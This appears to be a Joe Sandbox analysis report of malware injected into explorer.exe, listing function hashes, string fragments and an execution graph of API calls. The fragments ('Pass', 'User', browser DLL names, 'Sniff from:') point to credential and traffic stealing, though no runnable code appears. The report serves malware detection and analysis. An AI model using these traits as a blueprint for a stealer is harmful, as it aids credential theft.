                                                          • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                          • API String ID: 0-1539916866
                                                          • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                          • Instruction ID: 19bd8555c7210ce0b42f12aa4006e4c2fd41e90f7bf9b0b4d084f96ba86503bf
                                                          • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                          • Instruction Fuzzy Hash: 8741AE70A1CB088FDB14DF88A5467AE7BE2FB98700F40025EE809D3245DBB5ED458BD6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101CBAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                          • API String ID: 0-355182820
                                                          • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                          • Instruction ID: 8ab2bd8419b552ed1fa72578210b69d314ecc8503529bccaf5d1de2482315f64
                                                          • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                          • Instruction Fuzzy Hash: 3AC16A74618B098FC758EF68C486BEAF3E1FBA4304F40462EA59AC7240DF34E515CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101CBF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                          • API String ID: 0-97273177
                                                          • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                          • Instruction ID: f32558ce97c2708036d163963a8e7f0f78f4e3e6f808e1c13440e1d0de69c003
                                                          • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                          • Instruction Fuzzy Hash: 0B51B3345187488FD709DF18C5813AAB7E5FB95704F501A2EE8CBC7242DBB8E906CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C52F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                          • API String ID: 0-639201278
                                                          • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                          • Instruction ID: e9df93e3576619393a5380814c8fb8b8476fbc48c36dc67d7871074e538fcbc6
                                                          • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                          • Instruction Fuzzy Hash: 98C18075618A194FC748EF68D596BAAB3E1FBB4304F814329944AC7250DF34EA42CB85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C52F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                          • API String ID: 0-639201278
                                                          • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                          • Instruction ID: e353be3562122d3681f338c6820e6ff8d587e0c1b4cee74a52967d57932c4627
                                                          • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                          • Instruction Fuzzy Hash: 2CC18074618A194FC748EF68D596BAAF3E1FBB8304F914329944EC7250DF34EA42CB85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C6CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: UR$2$L: $Pass$User$name$word
                                                          • API String ID: 0-2058692283
                                                          • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                          • Instruction ID: 7a66efc70f733f4247cb9eaed025fa7dd41d31f0c08f17d8eb30643fc1dc35e6
                                                          • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                          • Instruction Fuzzy Hash: CFA1CD30618B488BDB19DFA8D544BEEB7E1FFA8300F00462DE48AD7251EF74E9558789
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C6CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: UR$2$L: $Pass$User$name$word
                                                          • API String ID: 0-2058692283
                                                          • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                          • Instruction ID: 97ea3575370895f47e5af7233fbe90cad1250698a0be6916561af16b291b7cf1
                                                          • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                          • Instruction Fuzzy Hash: BF91AE706187488BDB19DFA8D544BEEB7E1FBA8300F00462EE48AD7241EF74E5558789
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C6352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $.$e$n$v
                                                          • API String ID: 0-1849617553
                                                          • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                          • Instruction ID: 66502525fbc2618906d275432ab0625bbcdb7677a468aa5d3746987debe51b29
                                                          • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                          • Instruction Fuzzy Hash: E871C435618B498FD758DFA8C4857AAB7F0FF68304F10062EE44AC7261EF75E9468B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C1C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2.dl$dll$l32.$ole3$shel
                                                          • API String ID: 0-1970020201
                                                          • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                          • Instruction ID: 2815acaaa1cc4c046ea6627f36db6091373865de4572dad6ceb3b9c715bcb4a0
                                                          • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                          • Instruction Fuzzy Hash: 2C514DB0914B4C8BDB55DFA8C045BEAB7F1FF68300F40462EE59AE7254EF34A5418B89
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C286F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4$\$dll$ion.$vers
                                                          • API String ID: 0-1610437797
                                                          • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                          • Instruction ID: 3fe5907ce32be459367c0857befb4356ced9d9b89a322036f53e3c40788bf0b5
                                                          • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                          • Instruction Fuzzy Hash: 79418334218B8C8FDBA5EF6499457EA77E0FBA4341F51462E944EC7240EF34D9058782
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C44B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 32.d$cli.$dll$sspi$user
                                                          • API String ID: 0-327345718
                                                          • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                          • Instruction ID: d7bc18bf87e9d8fe1bdaa8494e91040f0c147294416dac9c63af961696578dae
                                                          • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                          • Instruction Fuzzy Hash: 2B417C70A58E0D8FCB94EF6882957AE77E1FB78341F41416AA80ED7200DE38D941CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C2432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$el32$h$kern
                                                          • API String ID: 0-4264704552
                                                          • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                          • Instruction ID: e275fa72e8c04abead0bd14cbc0a524de9565a8e12b609883848a2d529e08e08
                                                          • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                          • Instruction Fuzzy Hash: F8418F70608B4D8FD7A9DF6881943ABB7E1FBA8300F104A2ED49EC3655DB74D945CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C90B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $Snif$f fr$om:
                                                          • API String ID: 0-3434893486
                                                          • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                          • Instruction ID: 0d64eb6cd4550a19e958efe70311137c264c4947c6d81c6de2da29ce7c80805b
                                                          • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                          • Instruction Fuzzy Hash: DB31E33150CB885FC71ADB28C1897EAB7D4FBA4300F50491EE49BC7252EE34E54ACB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C90C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $Snif$f fr$om:
                                                          • API String ID: 0-3434893486
                                                          • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                          • Instruction ID: c14914975258ed8ac49d5b1d5619c8047aa17223d1b7c5310e5b16c879cad1e2
                                                          • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                          • Instruction Fuzzy Hash: D031F271508B486FD719DB28C5897EAB7D5FBB4300F40491EE49BC3292EE34E506CA83
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C4FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$chro$hild$me_c
                                                          • API String ID: 0-3136806129
                                                          • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                          • Instruction ID: 907352160b6c90173a56614dc9b2840e540a0c0a7181228c6c496ccfd92f6bd2
                                                          • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                          • Instruction Fuzzy Hash: B2318E34118B484FC784EF688595BAAB7E1FFB8300F84462DA44ECB215DF34E945C796
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C4FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$chro$hild$me_c
                                                          • API String ID: 0-3136806129
                                                          • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                          • Instruction ID: 821941cb494ba08fa6c253c7df94506fc1343821f760894afbbbbe2f2fbc58d6
                                                          • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                          • Instruction Fuzzy Hash: 3D31AE34218B488FC784DF688595BAAB7E1FFB8300F84463DA44ACB255DF34D946CB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C78C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 0-319646191
                                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction ID: 32aa2967e9f8a1d99271585c94906372948ce3665a37d67cc912671f07f5e0a4
                                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction Fuzzy Hash: 7231D131614A0C8BCB44EFA8C8857EEBBE0FB68214F40022AE44ED7240DE78DA45C799
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C78BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 0-319646191
                                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction ID: 99dc46d31b704b5328cdc7824d6cd532b64d0bccc09fd10ba5c2eed570d0f84d
                                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction Fuzzy Hash: 0B21D530A10A4C8BCB05EFA8C9457EDBBE0FF78204F40422AE45AD7240DF78D605C795
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C8E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$l$l$t
                                                          • API String ID: 0-168566397
                                                          • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                          • Instruction ID: 54419edd33b458d067bd13cd180c2447077ae1313aa1378f18e69ab97c4aec5a
                                                          • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                          • Instruction Fuzzy Hash: 71216B74A24A0D9BDB48EFA8D1457EEBBF1FB28314F50462EE409D3600DB78E595CB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C8E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$l$l$t
                                                          • API String ID: 0-168566397
                                                          • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                          • Instruction ID: 8d9f2078d6e7a16b4dc4d3ed6d6ce16d9d108ac2d235cdd5066bb8aee91bce6e
                                                          • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                          • Instruction Fuzzy Hash: E2217C74A24A0D9BDB44EFA8C0457AEBAF0FB28314F50462EE009D3600DB78E591CB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 101C8FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4459301648.00000000100D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 100D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_100d0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: auth$logi$pass$user
                                                          • API String ID: 0-2393853802
                                                          • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                          • Instruction ID: 90dfb7915e1446935f1aa765e7e5a207e28894a764e345e4ac889153b7164e24
                                                          • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                          • Instruction Fuzzy Hash: 3121CD30614B0D8BCB45CF9999817DEB7E6EF98344F004629E40AEB244D7B5E914CBC6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:1.6%
                                                          Dynamic/Decrypted Code Coverage:2%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:591
                                                          Total number of Limit Nodes:70
                                                          execution_graph 103403 4822ad0 LdrInitializeThunk 103407 25bf10d 103410 25bb9d0 103407->103410 103411 25bb9f6 103410->103411 103418 25a9d40 103411->103418 103413 25bba02 103414 25bba26 103413->103414 103426 25a8f30 103413->103426 103464 25ba6b0 103414->103464 103467 25a9c90 103418->103467 103420 25a9d4d 103421 25a9d54 103420->103421 103479 25a9c30 103420->103479 103421->103413 103427 25a8f57 103426->103427 103896 25ab1c0 103427->103896 103429 25a8f69 103900 25aaf10 103429->103900 103431 25a8f86 103439 25a8f8d 103431->103439 103971 25aae40 LdrLoadDll 103431->103971 103433 25a90f2 103433->103414 103435 25a8ffc 103916 25af410 103435->103916 103437 25a9006 103437->103433 103438 25bbf90 2 API calls 103437->103438 103440 25a902a 103438->103440 103439->103433 103904 25af380 103439->103904 103441 25bbf90 2 API calls 103440->103441 103442 25a903b 103441->103442 103443 25bbf90 2 API calls 103442->103443 103444 25a904c 103443->103444 103928 25aca90 103444->103928 103446 25a9059 103447 25b4a50 8 API calls 103446->103447 103448 25a9066 103447->103448 103449 25b4a50 8 API calls 103448->103449 103450 25a9077 103449->103450 103451 25a9084 103450->103451 103452 25a90a5 103450->103452 103938 25ad620 103451->103938 103454 25b4a50 8 API calls 103452->103454 103460 25a90c1 103454->103460 103457 25a90e9 103458 25a8d00 23 API calls 103457->103458 103458->103433 103459 25a9092 103954 25a8d00 103459->103954 103460->103457 103972 25ad6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 103460->103972 103465 25baf60 LdrLoadDll 103464->103465 103466 25ba6cf 103465->103466 103498 25b8bc0 103467->103498 103471 25a9cb6 103471->103420 103472 25a9cac 103472->103471 103505 25bb2b0 103472->103505 103474 25a9cf3 103474->103471 103516 25a9ab0 103474->103516 103476 25a9d13 103522 25a9620 LdrLoadDll 103476->103522 103478 25a9d25 103478->103420 103871 25bb5a0 103479->103871 103482 25bb5a0 LdrLoadDll 103483 25a9c5b 103482->103483 103484 25bb5a0 LdrLoadDll 103483->103484 103485 25a9c71 103484->103485 103486 25af180 103485->103486 103487 25af199 103486->103487 103879 25ab040 103487->103879 103489 25af1ac 103883 25ba1e0 103489->103883 103492 25a9d65 103492->103413 103494 25af1d2 103495 25af1fd 103494->103495 103889 25ba260 103494->103889 103497 25ba490 2 API calls 103495->103497 103497->103492 103499 25b8bcf 103498->103499 103523 25b4e50 103499->103523 103501 25a9ca3 103502 25b8a70 103501->103502 103529 25ba600 103502->103529 103506 25bb2c9 103505->103506 103536 25b4a50 103506->103536 103508 25bb2e1 103509 25bb2ea 103508->103509 103575 25bb0f0 103508->103575 103509->103474 103511 25bb2fe 103511->103509 103593 25b9f00 103511->103593 103849 25a7ea0 103516->103849 103518 25a9ad1 103518->103476 103519 25a9aca 103519->103518 103862 25a8160 103519->103862 103522->103478 103524 25b4e5e 103523->103524 103526 25b4e6a 103523->103526 103524->103526 103528 25b52d0 LdrLoadDll 103524->103528 103526->103501 103527 25b4fbc 103527->103501 103528->103527 103532 25baf60 103529->103532 103531 25b8a85 103531->103472 103533 25baf70 103532->103533 103534 25baf92 103532->103534 103535 25b4e50 LdrLoadDll 103533->103535 103534->103531 103535->103534 103537 25b4d85 103536->103537 103539 25b4a64 103536->103539 103537->103508 103539->103537 103601 25b9c50 103539->103601 103541 25b4b73 103661 25ba460 LdrLoadDll 103541->103661 103542 25b4b90 103604 25ba360 103542->103604 103545 25b4b7d 103545->103508 103546 25b4bb7 103547 25bbdc0 2 API calls 103546->103547 103549 25b4bc3 103547->103549 103548 25b4d49 103551 25ba490 2 API calls 103548->103551 103549->103545 103549->103548 103550 25b4d5f 103549->103550 103555 25b4c52 103549->103555 103670 25b4790 LdrLoadDll NtReadFile NtClose 103550->103670 103552 25b4d50 103551->103552 103552->103508 103554 25b4d72 103554->103508 103556 25b4cb9 103555->103556 103558 25b4c61 103555->103558 103556->103548 103557 25b4ccc 103556->103557 103663 25ba2e0 103557->103663 103560 25b4c7a 103558->103560 103561 25b4c66 103558->103561 103563 25b4c7f 103560->103563 103564 25b4c97 103560->103564 103662 25b4650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 103561->103662 103607 25b46f0 103563->103607 103564->103552 103619 25b4410 103564->103619 103566 25b4c70 103566->103508 103569 25b4d2c 103667 25ba490 103569->103667 103570 25b4c8d 103570->103508 103573 25b4caf 103573->103508 103574 25b4d38 103574->103508 103576 25bb101 103575->103576 103577 25bb113 103576->103577 103688 25bbd40 103576->103688 103577->103511 103579 25bb134 103691 25b4070 103579->103691 103581 25bb180 103581->103511 103582 25bb157 103582->103581 103583 25b4070 3 API calls 103582->103583 103586 25bb179 103583->103586 103585 25bb20a 103587 25bb21a 103585->103587 103817 25baf00 LdrLoadDll 103585->103817 103586->103581 103723 25b5390 103586->103723 103733 25bad70 103587->103733 103590 25bb248 103812 25b9ec0 103590->103812 103594 25baf60 LdrLoadDll 103593->103594 103595 25b9f1c 103594->103595 103843 4822c0a 103595->103843 103596 25b9f37 103598 25bbdc0 103596->103598 103846 25ba670 103598->103846 103600 25bb359 103600->103474 103602 25baf60 LdrLoadDll 103601->103602 103603 25b4b44 103602->103603 103603->103541 103603->103542 103603->103545 103605 25ba37c NtCreateFile 103604->103605 103606 25baf60 LdrLoadDll 103604->103606 103605->103546 103606->103605 103608 25b470c 103607->103608 103609 25ba2e0 LdrLoadDll 103608->103609 103610 25b472d 103609->103610 103611 25b4748 103610->103611 103612 25b4734 103610->103612 103614 25ba490 2 API calls 103611->103614 103613 25ba490 2 API calls 103612->103613 103616 25b473d 103613->103616 103615 25b4751 103614->103615 103671 25bbfd0 LdrLoadDll RtlAllocateHeap 103615->103671 103616->103570 103618 25b475c 103618->103570 103620 25b445b 103619->103620 103621 25b448e 103619->103621 103622 25ba2e0 LdrLoadDll 103620->103622 103623 25b45d9 103621->103623 103627 25b44aa 103621->103627 103624 25b4476 103622->103624 103625 25ba2e0 LdrLoadDll 103623->103625 103626 25ba490 2 API calls 103624->103626 103631 25b45f4 103625->103631 103628 25b447f 103626->103628 103629 25ba2e0 LdrLoadDll 103627->103629 103628->103573 103630 25b44c5 103629->103630 103633 25b44cc 103630->103633 103634 25b44e1 103630->103634 103684 25ba320 LdrLoadDll 103631->103684 103636 25ba490 2 API calls 103633->103636 103637 25b44fc 103634->103637 103638 25b44e6 103634->103638 103635 25b462e 103640 25ba490 2 API calls 103635->103640 103641 25b44d5 103636->103641 103639 25b4501 103637->103639 103672 25bbf90 103637->103672 103642 25ba490 2 API calls 103638->103642 103644 25b4513 103639->103644 103675 25ba410 103639->103675 103645 25b4639 103640->103645 103641->103573 103643 25b44ef 103642->103643 103643->103573 103644->103573 103645->103573 103648 25b4567 103649 25b457e 103648->103649 103683 25ba2a0 LdrLoadDll 103648->103683 103650 25b459a 103649->103650 103651 25b4585 103649->103651 103654 25ba490 2 API calls 103650->103654 103653 25ba490 2 API calls 103651->103653 103653->103644 103655 25b45a3 103654->103655 103656 25b45cf 103655->103656 103678 25bbb90 103655->103678 103656->103573 103658 25b45ba 103659 25bbdc0 2 API calls 103658->103659 103660 25b45c3 103659->103660 103660->103573 103661->103545 103662->103566 103664 25baf60 LdrLoadDll 103663->103664 103665 25b4d14 103664->103665 103666 25ba320 LdrLoadDll 103665->103666 103666->103569 103668 25baf60 LdrLoadDll 103667->103668 103669 25ba4ac NtClose 103668->103669 103669->103574 103670->103554 103671->103618 103685 25ba630 103672->103685 103674 25bbfa8 103674->103639 103676 25baf60 LdrLoadDll 103675->103676 103677 25ba42c 